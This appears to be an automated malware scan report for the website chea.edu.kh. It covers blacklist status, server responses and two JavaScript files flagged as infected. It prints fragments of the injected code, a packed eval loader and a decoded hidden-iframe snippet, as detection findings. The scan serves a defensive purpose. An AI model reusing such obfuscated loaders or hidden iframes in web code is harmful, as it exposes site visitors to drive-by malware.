Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=chea.edu.kh
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://chea.edu.kh/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://chea.edu.kh/ | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Dec 2014 20:23:19 GMT Location: http://www.chea.edu.kh/cheakhm/ Server: Apache/2.2.3 (CentOS) Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.3 X-Powered-By: PleskLin | clean |
http://www.chea.edu.kh/cheakhm/ | 200 OK Content-Length: 56699 Content-Type: text/html | clean |
http://www.chea.edu.kh/cheakhm/templates/it_tribune/js/mootools.php | 500 Can't connect to www.chea.edu.kh:80 Content-Length: 190 Content-Type: text/plain | clean |
http://www.chea.edu.kh/test404page.js | 500 Can't connect to www.chea.edu.kh:80 Content-Length: 190 Content-Type: text/plain | clean |
http://chea.edu.kh/cheakhm/templates/it_tribune/js/ice-menu.js | 200 OK Content-Length: 19392 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('A 2z=D 2A({2B:2C,4:{U:"2Z",2D:"30",R:"10 1l 18",Y:31,1m:1n.32.33.34,2E:2i,2F:1J,2G:1J,O:"Z",7:{x:"P",y:"V"},1s:{x:0,y:0},1c:{x:0,y:0},G:35,1d:19,1g:19,1R:19,36:1J},1a:D if(f)e(s);}
Antivirus reports:
http://chea.edu.kh/cheakhm/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://www.chea.edu.kh/cheakhm/plugins/content/plugin_besps/besps.js | 200 OK Content-Length: 12951 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function besps_slideshow(besps_slideid,besps_ftim,besps_stim,besps_steps,besps_startwhen,besps_emax,besps_caps,besps_preload){ var self = this; var slideid=besps_slideid; var ftim=besps_ftim; var stim=besps_stim; var steps=besps_steps; var startwhen=besps_startwhen; var emax=besps_emax; var preload=besps_preload; var stopit=1; var startim=1; var u=0; var parr = new Array(); var ptofade,pnext,factor,mytimeout; var caps=besps_c if(f)e(s);}
Decoded script:
ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see
Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: chea.edu.kh
Result:
HTTP/1.1 302 Found
Connection: close
Date: Mon, 22 Dec 2014 20:23:19 GMT
Location: http://www.chea.edu.kh/cheakhm/
Server: Apache/2.2.3 (CentOS)
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.3.3
X-Powered-By: PleskLin
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: chea.edu.kh
Referer: http://www.google.com/search?q=chea.edu.kh
Result:
The result is similar to the first query. There are no suspicious redirects found.